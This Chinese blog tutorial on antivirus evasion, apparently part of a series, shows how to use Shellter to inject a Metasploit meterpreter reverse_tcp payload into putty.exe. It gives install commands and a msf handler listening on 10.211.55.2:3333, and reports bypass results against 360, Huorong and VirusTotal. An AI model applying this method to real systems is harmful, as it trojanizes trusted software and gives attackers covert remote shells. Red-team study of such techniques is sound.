0x01 免殺能力一覽表

幾點(diǎn)說(shuō)明：

1、上表中標(biāo)識(shí) √ 說(shuō)明相應(yīng)殺毒軟件未檢測(cè)出病毒，也就是代表了Bypass。

2、為了更好的對(duì)比效果，大部分測(cè)試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機(jī)測(cè)試時(shí)只是安裝了360全家桶和火絨，所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動(dòng)態(tài)查殺。360殺毒版本5.0.0.8160(2019.12.12)，火絨版本5.0.33.13(2019.12.12)，360安全衛(wèi)士12.0.0.2001(2019.12.17)。

4、其他殺軟的檢測(cè)指標(biāo)是在virustotal.com（簡(jiǎn)稱VT）上在線查殺，所以可能只是代表了靜態(tài)查殺能力，數(shù)據(jù)僅供參考，不足以作為免殺的精確判斷指標(biāo)。

0x02 前言

Shellter和Venom、Veil是三大老牌免殺工具，Shellter是一個(gè)開源的免殺工具，利用動(dòng)態(tài)Shellcode注入或者命令來(lái)實(shí)現(xiàn)免殺的效果。

0x03 安裝shellter

1、kali中已經(jīng)自帶shellter，可在圖形界面中直接執(zhí)行shellter命令即可

2、ubuntu系統(tǒng)中apt安裝

apt-get update apt-get install shellter

3、手動(dòng)下載windows版
官方下載站點(diǎn) https://www.shellterproject.com/download/
下載后解壓，無(wú)需安裝，cmd下可直接使用

0x04 生成payload

我就直接用kali自帶的shellter進(jìn)行演示，需要提前準(zhǔn)備一個(gè)pe文件作為被注入程序。我還是用之前選的putty.exe來(lái)進(jìn)行測(cè)試。

之后程序會(huì)把putty.exe進(jìn)行備份，因?yàn)樯傻膒ayload會(huì)自動(dòng)覆蓋原來(lái)的putty.exe。

還是選擇windows/meterpreter/reverse_tcp作為payload

上面有個(gè)選項(xiàng)Enable Stealth Mode，是否啟用隱身模式，啟用后免殺效果會(huì)變差，建議不啟用。

全程自動(dòng)化生成，最終的生成文件會(huì)替換原來(lái)的putty.exe。

通過(guò)對(duì)比可發(fā)現(xiàn)程序稍微變大了

在msf中使用handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp進(jìn)行監(jiān)聽

在測(cè)試機(jī)中執(zhí)行生成的putty.exe，360和火絨均可免殺，我試的時(shí)候火絨不可免殺，可能我的火絨版本比較高

msf正常上線

0x05 小結(jié)

Shellter安裝非常簡(jiǎn)單，使用也非常便捷，而且生成的payload免殺效果也都比較好，windows和linux下都可以使用，實(shí)在是居家旅行、**滅口必備良藥。我是用的自動(dòng)模式進(jìn)行生產(chǎn)payload,你可以根據(jù)自己的需要進(jìn)行手動(dòng)配置，這樣生成的payload免殺效果會(huì)更好。

因?yàn)镾hellter生成的shellcode是動(dòng)態(tài)的，所以被查殺的幾率也有所不同，測(cè)試過(guò)幾次自動(dòng)化生成的payload，最好的秒殺效果是4/71，最差的15/70，整體來(lái)說(shuō)也算不錯(cuò)了

0x06 參考

msf免殺及后滲透技術(shù)：https://bbs.ichunqiu.com/thread-49618-1-1.html

總結(jié)

以上是生活随笔為你收集整理的远控免杀专题7 ---shellter免杀的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。